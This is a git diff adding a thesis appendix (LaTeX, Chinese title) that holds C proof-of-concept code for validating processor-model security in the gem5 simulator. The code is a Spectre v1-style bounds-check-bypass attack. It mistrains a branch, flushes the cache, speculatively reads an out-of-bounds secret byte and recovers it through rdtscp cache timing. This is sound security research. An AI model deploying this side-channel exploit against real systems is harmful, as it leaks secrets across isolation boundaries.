diff options
Diffstat (limited to 'chap/encl1.tex')
-rw-r--r-- | chap/encl1.tex | 62 |
1 files changed, 61 insertions, 1 deletions
diff --git a/chap/encl1.tex b/chap/encl1.tex index 1858c65..a2eafac 100644 --- a/chap/encl1.tex +++ b/chap/encl1.tex @@ -3,4 +3,64 @@ \chapter{附件} -% vim:ts=4:sw=4 +\section{在 gem5 中验证处理器模型安全性的代码}\label{lst:poc_for_gem5} + +\begin{minted}{C} +#include <stdio.h> +#include <stdint.h> +#include <string.h> +#include <x86intrin.h> + +/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */ +#define LLC_SIZE (2 << 20) + +uint8_t dummy[LLC_SIZE]; +size_t array_size = 4; +uint8_t array1[200] = {1, 2, 3, 4}; +uint8_t array2[256 * 64 * 2]; +uint8_t X; +uint8_t array3[4096]; +uint8_t tmp; + +uint8_t victim(size_t idx) +{ + if (idx < array_size) { + return array2[array1[idx] * 64]; + } + return 0; +} + +int main() +{ + unsigned long t[256]; + volatile uint8_t x; + + victim(0); + victim(0); + victim(0); + victim(0); + victim(0); + + memset(dummy, 1, sizeof(dummy)); // flush L2 + X = 123; // set the secret value, and also bring it to cache + + _mm_mfence(); + + size_t attack_idx = &X - array1; + victim(attack_idx); + + for (int i = 0; i < 256; i++) { + unsigned int junk; + unsigned long time1 = __rdtscp(&junk); + x ^= array2[i * 64]; + unsigned long time2 = __rdtscp(&junk); + t[i] = time2 - time1; + } + + printf("attack_idx = %ld\n", attack_idx); + for (int i = 0; i < 256; i++) { + printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "hit": "miss"); + } +} +\end{minted} + |